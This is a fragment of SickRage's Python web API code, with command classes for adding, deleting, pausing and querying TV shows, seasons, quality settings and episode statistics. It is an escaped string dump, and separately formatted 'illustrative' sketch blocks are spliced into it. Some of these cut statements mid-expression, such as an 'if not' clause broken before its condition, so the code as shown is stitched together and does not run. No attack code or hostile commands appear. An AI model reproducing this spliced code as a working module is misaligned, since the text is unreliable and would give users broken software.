int(sickbeard.USE_SUBTITLES),\n False, ""int"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Add an existing show in SickRage """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if show_obj:\n return _responds(RESULT_FAILURE, msg=""An existing indexerid already exists in the database"")\n\n if not 
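# --- illustrative note (not from the original module) ---
# show_dict above serializes booleans with the (0, 1)[flag] tuple-indexing
# idiom: True/False can index the tuple because bool is a subclass of int.
# int(flag) says the same thing more directly.
paused = True
assert (0, 1)[paused] == 1 == int(paused)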
ek(os.path.isdir, self.location):\n return _responds(RESULT_FAILURE, msg=\'Not a valid location\')\n\n indexer_name = None\n indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()\n\n if indexer_result[\'result\'] == result_type_map[RESULT_SUCCESS]:\n if not indexer_result[\'data\'][\'results\']:\n return _responds(RESULT_FAILURE, msg=""Empty results returned, check indexerid and try again"")\n if len(indexer_result[\'data\'][\'results\']) == 1 and \'name\' in indexer_result[\'data\'][\'results\'][0]:\n indexer_name = indexer_result[\'data\'][\'results\'][0][\'name\']\n\n if not indexer_name:\n return _responds(RESULT_FAILURE, msg=""Unable to retrieve information from indexer"")\n\n # set indexer so we can pass it along when adding show to SR\n indexer = indexer_result[\'data\'][\'results\'][0][\'indexer\']\n\n quality_map = {\'sdtv\': Quality.SDTV,\n \'sddvd\': Quality.SDDVD,\n \'hdtv\': Quality.HDTV,\n \'rawhdtv\': Quality.RAWHDTV,\n \'fullhdtv\': Quality.FULLHDTV,\n \'hdwebdl\': Quality.HDWEBDL,\n \'fullhdwebdl\': Quality.FULLHDWEBDL,\n \'hdbluray\': Quality.HDBLURAY,\n \'fullhdbluray\': Quality.FULLHDBLURAY,\n \'unknown\': Quality.UNKNOWN}\n\n # use default quality as a fail-safe\n new_quality = int(sickbeard.QUALITY_DEFAULT)\n i_quality_id = []\n a_quality_id = []\n\n if self.initial:\n for quality in self.initial:\n i_quality_id.append(quality_map[quality])\n if self.archive:\n for quality in self.archive:\n a_quality_id.append(quality_map[quality])\n\n if i_quality_id or a_quality_id:\n new_quality = Quality.combineQualities(i_quality_id, a_quality_id)\n\n sickbeard.showQueueScheduler.action.addShow(\n int(indexer), int(self.indexerid), self.location, default_status=sickbeard.STATUS_DEFAULT,\n quality=new_quality, flatten_folders=int(self.flatten_folders), subtitles=self.subtitles,\n default_status_after=sickbeard.STATUS_DEFAULT_AFTER, archive=self.archive_firstmatch\n )\n\n return _responds(RESULT_SUCCESS, {""name"": indexer_name}, indexer_name + "" has been queued to be added"")\n\n\nclass CMD_ShowAddNew(ApiCall):\n _help = {\n ""desc"": ""Add a new show to SickRage"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""initial"": {""desc"": ""The initial quality of the show""},\n ""location"": {""desc"": ""The path to the folder where the show should be created""},\n ""archive"": {""desc"": ""The archive quality of the show""},\n ""flatten_folders"": {""desc"": ""True to flatten the show folder, False otherwise""},\n ""status"": {""desc"": ""The status of missing episodes""},\n ""lang"": {""desc"": ""The 2-letter language code of the desired show""},\n ""subtitles"": {""desc"": ""True to search for subtitles, False otherwise""},\n ""anime"": {""desc"": ""True to mark the show as an anime, False otherwise""},\n ""scene"": {""desc"": ""True if episodes search should be made by scene numbering, False otherwise""},\n ""future_status"": {""desc"": ""The status of future episodes""},\n ""archive_firstmatch"": {\n ""desc"": ""True if episodes should be archived when first match is downloaded, False otherwise""\n },\n }\n }\n\n def __init__(self, args, kwargs):\n self.valid_languages = sickbeard.indexerApi().config[\'langabbv_to_id\']\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n self.location, args = self.check_params(args, kwargs, 
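# --- illustrative sketch (not from the original module) ---
# Every command __init__ above pulls typed, validated parameters through
# check_params(args, kwargs, name, default, required, type, allowed) and
# threads the remaining positional args along. A simplified, self-contained
# sketch of that contract (hypothetical, not the real helper):
def check_params(args, kwargs, key, default, required, type_, allowed):
    if args:  # positional values are consumed first
        value, args = args[0], args[1:]
    else:
        value = kwargs.get(key, default)
    if required and value is None:
        raise ValueError("missing required parameter: " + key)
    if value is not None and type_ == "int":
        value = int(value)
    if allowed and value is not None and value not in allowed:
        raise ValueError("%r not allowed for %s" % (value, key))
    return value, args

indexerid, rest = check_params(("123",), {}, "indexerid", None, True, "int", [])
assert indexerid == 123 and rest == ()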
""location"", None, False, ""string"", [])\n self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"",\n [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""])\n self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"",\n [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""])\n self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"",\n bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, ""bool"", [])\n self.status, args = self.check_params(args, kwargs, ""status"", None, False, ""string"",\n [""wanted"", ""skipped"", ""ignored""])\n self.lang, args = self.check_params(args, kwargs, ""lang"", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, ""string"",\n self.valid_languages.keys())\n self.subtitles, args = self.check_params(args, kwargs, ""subtitles"", bool(sickbeard.USE_SUBTITLES),\n False, ""bool"", [])\n self.anime, args = self.check_params(args, kwargs, ""anime"", bool(sickbeard.ANIME_DEFAULT), False,\n ""bool"", [])\n self.scene, args = self.check_params(args, kwargs, ""scene"", bool(sickbeard.SCENE_DEFAULT), False,\n ""bool"", [])\n self.future_status, args = self.check_params(args, kwargs, ""future_status"", None, False, ""string"",\n [""wanted"", ""skipped"", ""ignored""])\n self.archive_firstmatch, args = self.check_params(args, kwargs, ""archive_firstmatch"",\n bool(sickbeard.ARCHIVE_DEFAULT), False, ""bool"", [])\n\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Add a new show to SickRage """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if show_obj:\n return _responds(RESULT_FAILURE, msg=""An existing indexerid already exists in database"")\n\n if not self.location:\n if sickbeard.ROOT_DIRS != """":\n root_dirs = sickbeard.ROOT_DIRS.split(\'|\')\n root_dirs.pop(0)\n default_index = int(sickbeard.ROOT_DIRS.split(\'|\')[0])\n self.location = root_dirs[default_index]\n else:\n return _responds(RESULT_FAILURE, msg=""Root directory is not set, please provide a location"")\n\n if not ek(os.path.isdir, self.location):\n return _responds(RESULT_FAILURE, msg=""\'"" + self.location + ""\' is not a valid location"")\n\n quality_map = {\'sdtv\': Quality.SDTV,\n \'sddvd\': Quality.SDDVD,\n \'hdtv\': Quality.HDTV,\n \'rawhdtv\': Quality.RAWHDTV,\n \'fullhdtv\': Quality.FULLHDTV,\n \'hdwebdl\': Quality.HDWEBDL,\n \'fullhdwebdl\': Quality.FULLHDWEBDL,\n \'hdbluray\': Quality.HDBLURAY,\n \'fullhdbluray\': Quality.FULLHDBLURAY,\n \'unknown\': Quality.UNKNOWN}\n\n # use default quality as a fail-safe\n new_quality = int(sickbeard.QUALITY_DEFAULT)\n i_quality_id = []\n a_quality_id = []\n\n if self.initial:\n for quality in self.initial:\n i_quality_id.append(quality_map[quality])\n if self.archive:\n for quality in self.archive:\n a_quality_id.append(quality_map[quality])\n\n if i_quality_id or a_quality_id:\n new_quality = Quality.combineQualities(i_quality_id, a_quality_id)\n\n # use default status as a fail-safe\n new_status = sickbeard.STATUS_DEFAULT\n if self.status:\n # convert the string status to a int\n for status in statusStrings:\n if statusStrings[status].lower() == str(self.status).lower():\n self.status = status\n break\n\n if self.status not in statusStrings:\n raise ApiError(""Invalid Status"")\n\n # only allow the status options we want\n if int(self.status) not in (WANTED, SKIPPED, IGNORED):\n 
return _responds(RESULT_FAILURE, msg=""Status prohibited"")\n new_status = self.status\n\n # use default status as a fail-safe\n default_ep_status_after = sickbeard.STATUS_DEFAULT_AFTER\n if self.future_status:\n # convert the string status to a int\n for status in statusStrings:\n if statusStrings[status].lower() == str(self.future_status).lower():\n self.future_status = status\n break\n\n if self.future_status not in statusStrings:\n raise ApiError(""Invalid Status"")\n\n # only allow the status options we want\n if int(self.future_status) not in (WANTED, SKIPPED, IGNORED):\n return _responds(RESULT_FAILURE, msg=""Status prohibited"")\n default_ep_status_after = self.future_status\n\n indexer_name = None\n indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run()\n\n if indexer_result[\'result\'] == result_type_map[RESULT_SUCCESS]:\n if not indexer_result[\'data\'][\'results\']:\n return _responds(RESULT_FAILURE, msg=""Empty results returned, check indexerid and try again"")\n if len(indexer_result[\'data\'][\'results\']) == 1 and \'name\' in indexer_result[\'data\'][\'results\'][0]:\n indexer_name = indexer_result[\'data\'][\'results\'][0][\'name\']\n\n if not indexer_name:\n return _responds(RESULT_FAILURE, msg=""Unable to retrieve information from indexer"")\n\n # set indexer for found show so we can pass it along\n indexer = indexer_result[\'data\'][\'results\'][0][\'indexer\']\n\n # moved the logic check to the end in an attempt to eliminate empty directory being created from previous errors\n show_path = ek(os.path.join, self.location, sanitize_filename(indexer_name))\n\n # don\'t create show dir if config says not to\n if sickbeard.ADD_SHOWS_WO_DIR:\n logger.log(u""Skipping initial creation of "" + show_path + "" due to config.ini setting"")\n else:\n dir_exists = helpers.makeDir(show_path)\n if not dir_exists:\n logger.log(u""API :: Unable to create the folder "" + show_path + "", can\'t add the show"", logger.ERROR)\n return _responds(RESULT_FAILURE, {""path"": show_path},\n ""Unable to create the folder "" + show_path + "", can\'t add the show"")\n else:\n helpers.chmodAsParent(show_path)\n\n sickbeard.showQueueScheduler.action.addShow(\n int(indexer), int(self.indexerid), show_path, default_status=new_status, quality=new_quality,\n flatten_folders=int(self.flatten_folders), lang=self.lang, subtitles=self.subtitles, anime=self.anime,\n scene=self.scene, default_status_after=default_ep_status_after, archive=self.archive_firstmatch\n )\n\n return _responds(RESULT_SUCCESS, {""name"": indexer_name}, indexer_name + "" has been queued to be added"")\n\n\nclass CMD_ShowCache(ApiCall):\n _help = {\n ""desc"": ""Check SickRage\'s cache to see if the images (poster, banner, fanart) for a show are valid"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Check SickRage\'s cache to see if the images (poster, banner, fanart) for a show are valid """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n # TODO: catch if cache dir is missing/invalid.. 
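# --- illustrative sketch (not from the original module) ---
# show_path above is built from the indexer's show name via
# sanitize_filename(). A minimal sketch of what such a helper typically does;
# the character set below is illustrative, not the project's exact rules.
import re

def sanitize_filename(name):
    cleaned = re.sub(r'[\\/*?"<>|:]', "", name)  # drop filesystem-hostile chars
    return cleaned.rstrip(". ")  # trailing dots/spaces break Windows paths

assert sanitize_filename('Who? What: "Show"!') == "Who What Show!"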
so it doesn\'t break show/show.cache\n # return {""poster"": 0, ""banner"": 0}\n\n cache_obj = image_cache.ImageCache()\n\n has_poster = 0\n has_banner = 0\n\n if ek(os.path.isfile, cache_obj.poster_path(show_obj.indexerid)):\n has_poster = 1\n if ek(os.path.isfile, cache_obj.banner_path(show_obj.indexerid)):\n has_banner = 1\n\n return _responds(RESULT_SUCCESS, {""poster"": has_poster, ""banner"": has_banner})\n\n\nclass CMD_ShowDelete(ApiCall):\n _help = {\n ""desc"": ""Delete a show in SickRage"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""removefiles"": {\n ""desc"": ""True to delete the files associated with the show, False otherwise. This can not be undone!""\n },\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n self.removefiles, args = self.check_params(args, kwargs, ""removefiles"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Delete a show in SickRage """"""\n error, show = Show.delete(self.indexerid, self.removefiles)\n\n if error:\n return _responds(RESULT_FAILURE, msg=error)\n\n return _responds(RESULT_SUCCESS, msg=\'%s has been queued to be deleted\' % show.name)\n\n\nclass CMD_ShowGetQuality(ApiCall):\n _help = {\n ""desc"": ""Get the quality setting of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the quality setting of a show """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n any_qualities, best_qualities = _map_quality(show_obj.quality)\n\n return _responds(RESULT_SUCCESS, {""initial"": any_qualities, ""archive"": best_qualities})\n\n\nclass CMD_ShowGetPoster(ApiCall):\n _help = {\n ""desc"": ""Get the poster of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the poster a show """"""\n return {\n \'outputType\': \'image\',\n \'image\': ShowPoster(self.indexerid),\n }\n\n\nclass CMD_ShowGetBanner(ApiCall):\n _help = {\n ""desc"": ""Get the banner of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the banner of a show """"""\n return {\n 
\'outputType\': \'image\',\n \'image\': ShowBanner(self.indexerid),\n }\n\n\nclass CMD_ShowGetNetworkLogo(ApiCall):\n _help = {\n ""desc"": ""Get the network logo of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """"""\n :return: Get the network logo of a show\n """"""\n return {\n \'outputType\': \'image\',\n \'image\': ShowNetworkLogo(self.indexerid),\n }\n\n\nclass CMD_ShowGetFanArt(ApiCall):\n _help = {\n ""desc"": ""Get the fan art of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the fan art of a show """"""\n return {\n \'outputType\': \'image\',\n \'image\': ShowFanArt(self.indexerid),\n }\n\n\nclass CMD_ShowPause(ApiCall):\n _help = {\n ""desc"": ""Pause or un-pause a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""pause"": {""desc"": ""True to pause the show, False otherwise""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n self.pause, args = self.check_params(args, kwargs, ""pause"", False, False, ""bool"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Pause or un-pause a show """"""\n error, show = Show.pause(self.indexerid, self.pause)\n\n if error:\n return _responds(RESULT_FAILURE, msg=error)\n\n return _responds(RESULT_SUCCESS, msg=\'%s has been %s\' % (show.name, (\'resumed\', \'paused\')[show.paused]))\n\n\nclass CMD_ShowRefresh(ApiCall):\n _help = {\n ""desc"": ""Refresh a show in SickRage"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Refresh a show in SickRage """"""\n error, show = Show.refresh(self.indexerid)\n\n if error:\n return _responds(RESULT_FAILURE, msg=error)\n\n return _responds(RESULT_SUCCESS, msg=\'%s has queued to be refreshed\' % show.name)\n\n\nclass CMD_ShowSeasonList(ApiCall):\n _help = {\n ""desc"": ""Get the list of seasons of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""sort"": {""desc"": ""Return the seasons in ascending or descending order""}\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n 
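# --- hedged refactoring sketch (not the project's actual design) ---
# CMD_ShowGetPoster/Banner/NetworkLogo/FanArt above differ only in the media
# wrapper they return. One way to collapse the boilerplate is a small class
# factory; ApiCallStub stands in for this module's ApiCall base.
class ApiCallStub:
    def __init__(self, args, kwargs):
        pass

def make_image_command(media_cls, what):
    class _Cmd(ApiCallStub):
        _help = {"desc": "Get the %s of a show" % what,
                 "requiredParameters": {"indexerid": {"desc": "Unique ID of a show"}}}

        def __init__(self, args, kwargs):
            self.indexerid = int(kwargs["indexerid"])  # real code: check_params(...)
            ApiCallStub.__init__(self, args, kwargs)

        def run(self):
            return {"outputType": "image", "image": media_cls(self.indexerid)}

    _Cmd.__name__ = "CMD_ShowGet" + what.title()
    return _Cmd

CMD_ShowGetPosterSketch = make_image_command(lambda iid: "poster-%d" % iid, "poster")
assert CMD_ShowGetPosterSketch((), {"indexerid": "42"}).run()["image"] == "poster-42"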
self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n self.sort, args = self.check_params(args, kwargs, ""sort"", ""desc"", False, ""string"", [""asc"", ""desc""])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the list of seasons of a show """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n my_db = db.DBConnection(row_type=""dict"")\n if self.sort == ""asc"":\n sql_results = my_db.select(""SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season ASC"",\n [self.indexerid])\n else:\n sql_results = my_db.select(""SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season DESC"",\n [self.indexerid])\n season_list = [] # a list with all season numbers\n for row in sql_results:\n season_list.append(int(row[""season""]))\n\n return _responds(RESULT_SUCCESS, season_list)\n\n\nclass CMD_ShowSeasons(ApiCall):\n _help = {\n ""desc"": ""Get the list of episodes for one or all seasons of a show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""season"": {""desc"": ""The season number""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n self.season, args = self.check_params(args, kwargs, ""season"", None, False, ""int"", [])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get the list of episodes for one or all seasons of a show """"""\n sho_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not sho_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n my_db = db.DBConnection(row_type=""dict"")\n\n if self.season is None:\n sql_results = my_db.select(\n ""SELECT name, episode, airdate, status, release_name, season, location, file_size, subtitles FROM tv_episodes WHERE showid = ?"",\n [self.indexerid])\n seasons = {}\n for row in sql_results:\n status, quality = Quality.splitCompositeStatus(int(row[""status""]))\n row[""status""] = _get_status_strings(status)\n row[""quality""] = get_quality_string(quality)\n if helpers.tryInt(row[\'airdate\'], 1) > 693595: # 1900\n dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(\n network_timezones.parse_date_time(row[\'airdate\'], sho_obj.airs, sho_obj.network))\n row[\'airdate\'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)\n else:\n row[\'airdate\'] = \'Never\'\n cur_season = int(row[""season""])\n cur_episode = int(row[""episode""])\n del row[""season""]\n del row[""episode""]\n if cur_season not in seasons:\n seasons[cur_season] = {}\n seasons[cur_season][cur_episode] = row\n\n else:\n sql_results = my_db.select(\n ""SELECT name, episode, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? 
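# --- illustrative sketch (not from the original module) ---
# CMD_ShowSeasonList above duplicates the query because ORDER BY direction
# cannot be bound as a SQL parameter; only values can. The usual pattern is
# to whitelist the direction and concatenate it, as in this self-contained
# sqlite3 example:
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE tv_episodes (showid INTEGER, season INTEGER)")
conn.executemany("INSERT INTO tv_episodes VALUES (?, ?)",
                 [(1, 1), (1, 1), (1, 2), (2, 9)])

sort = "asc"
direction = "ASC" if sort == "asc" else "DESC"  # whitelisted, never raw user input
rows = conn.execute(
    "SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season " + direction,
    [1]).fetchall()
assert [row[0] for row in rows] == [1, 2]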
AND season = ?"",\n [self.indexerid, self.season])\n if len(sql_results) == 0:\n return _responds(RESULT_FAILURE, msg=""Season not found"")\n seasons = {}\n for row in sql_results:\n cur_episode = int(row[""episode""])\n del row[""episode""]\n status, quality = Quality.splitCompositeStatus(int(row[""status""]))\n row[""status""] = _get_status_strings(status)\n row[""quality""] = get_quality_string(quality)\n if helpers.tryInt(row[\'airdate\'], 1) > 693595: # 1900\n dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting(\n network_timezones.parse_date_time(row[\'airdate\'], sho_obj.airs, sho_obj.network))\n row[\'airdate\'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat)\n else:\n row[\'airdate\'] = \'Never\'\n if cur_episode not in seasons:\n seasons[cur_episode] = {}\n seasons[cur_episode] = row\n\n return _responds(RESULT_SUCCESS, seasons)\n\n\nclass CMD_ShowSetQuality(ApiCall):\n _help = {\n ""desc"": ""Set the quality setting of a show. If no quality is provided, the default user setting is used."",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n ""initial"": {""desc"": ""The initial quality of the show""},\n ""archive"": {""desc"": ""The archive quality of the show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # this for whatever reason removes hdbluray not sdtv... which is just wrong. reverting to previous code.. plus we didnt use the new code everywhere.\n # self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", _get_quality_map().values()[1:])\n self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"",\n [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""])\n self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"",\n [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"",\n ""fullhdwebdl"",\n ""hdbluray"", ""fullhdbluray""])\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Set the quality setting of a show. If no quality is provided, the default user setting is used. 
""""""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n quality_map = {\'sdtv\': Quality.SDTV,\n \'sddvd\': Quality.SDDVD,\n \'hdtv\': Quality.HDTV,\n \'rawhdtv\': Quality.RAWHDTV,\n \'fullhdtv\': Quality.FULLHDTV,\n \'hdwebdl\': Quality.HDWEBDL,\n \'fullhdwebdl\': Quality.FULLHDWEBDL,\n \'hdbluray\': Quality.HDBLURAY,\n \'fullhdbluray\': Quality.FULLHDBLURAY,\n \'unknown\': Quality.UNKNOWN}\n\n # use default quality as a fail-safe\n new_quality = int(sickbeard.QUALITY_DEFAULT)\n i_quality_id = []\n a_quality_id = []\n\n if self.initial:\n for quality in self.initial:\n i_quality_id.append(quality_map[quality])\n if self.archive:\n for quality in self.archive:\n a_quality_id.append(quality_map[quality])\n\n if i_quality_id or a_quality_id:\n new_quality = Quality.combineQualities(i_quality_id, a_quality_id)\n show_obj.quality = new_quality\n\n return _responds(RESULT_SUCCESS,\n msg=show_obj.name + "" quality has been changed to "" + get_quality_string(show_obj.quality))\n\n\nclass CMD_ShowStats(ApiCall):\n _help = {\n ""desc"": ""Get episode statistics for a given show"",\n ""requiredParameters"": {\n ""indexerid"": {""desc"": ""Unique ID of a show""},\n },\n ""optionalParameters"": {\n ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""},\n }\n }\n\n def __init__(self, args, kwargs):\n # required\n self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", [])\n # optional\n # super, missing, help\n ApiCall.__init__(self, args, kwargs)\n\n def run(self):\n """""" Get episode statistics for a given show """"""\n show_obj = Show.find(sickbeard.showList, int(self.indexerid))\n if not show_obj:\n return _responds(RESULT_FAILURE, msg=""Show not found"")\n\n # show stats\n episode_status_counts_total = {""total"": 0}\n for status in statusStrings:\n if status in [UNKNOWN, DOWNLOADED, SNATCHED, SNATCHED_PROPER, ARCHIVED]:\n continue\n episode_status_counts_total[status] = 0\n\n # add all the downloaded qualities\n episode_qualities_counts_download = {""total"": 0}\n for statusCode in Quality.DOWNLOADED + Quality.ARCHIVED:\n status, quality = Quality.splitCompositeStatus(statusCode)\n if quality in [Quality.NONE]:\n continue\n episode_qualities_counts_download[statusCode] = 0\n\n # add all snatched qualities\n episode_qualities_counts_snatch = {""total"": 0}\n for statusCode in Quality.SNATCHED + Quality.SNATCHED_PROPER:\n status, quality = Quality.splitCompositeStatus(statusCode)\n if quality in [Quality.NONE]:\n continue\n episode_qualities_counts_snatch[statusCode] = 0\n\n my_db = db.DBConnection(row_type=""dict"")\n sql_results = my_db.select(""SELECT status, season FROM tv_episodes WHERE season != 0 AND showid = ?"",\n [self.indexerid])\n # the main loop that goes through all episodes\n for row in sql_results:\n status, quality = Quality.splitCompositeStatus(int(row[""status""]))\n\n episode_status_counts_total[""total""] += 1\n\n if status in Quality.DOWNLOADED + Quality.ARCHIVED:\n episode_qualities_counts_download[""total""] += 1\n episode_qualities_counts_download[int(row[""status""])] += 1\n elif status in Quality.SNATCHED + Quality.SNATCHED_PROPER:\n episode_qualities_counts_snatch[""total""] += 1\n episode_qualities_counts_snatch[int(row[""status""])] += 1\n elif status == 0: # we don\'t count NONE = 0 = N/A\n pass\n else:\n episode_status_counts_total[status] += 1\n\n # the outgoing container\n episodes_stats = {""downloaded"": {}}\n # turning codes 
into strings\n for statusCode in episode_qualities_counts_download:\n if statusCode == ""total"":\n episodes_stats[""downloaded""][""total""] = episode_qualities_counts_download[statusCode]\n continue\n status, quality = Quality.splitCompositeStatus(int(statusCode))\n status_string = Quality.qualityStrings[quality].lower().replace("" "", ""_"").replace(""("", """").replace("")"", """")\n episodes_stats[""downloaded""][status_string] = episode_qualities_counts_download[statusCode]\n\n episodes_stats[""snatched""] = {}\n # turning codes into strings\n # and combining proper and normal\n for statusCode in episode_qualities_counts_snatch:\n if statusCode == ""total"":\n episodes_stats[""snatched""][""total""] = episode_qualities_counts_snatch[statusCode]\n continue\n status, quality = Quality.splitCompositeStatus(int(statusCode))\n status_string = Quality.qualityStrings[quality].lower().replace("" "", ""_"").replace(""("", """").replace("")"", """")\n if Quality.qualityStrings[quality] in episodes_stats[""snatched""]:\n episodes_stats[""snatched""][status_string] += episode_qualities_counts_snatch[statusCode]\n else:\n episodes_stats[""snatched""][status_string] = episode_qualities_counts_snatch[statusCode]\n\n # episodes_stats[""total""] = {}\n for statusCode in 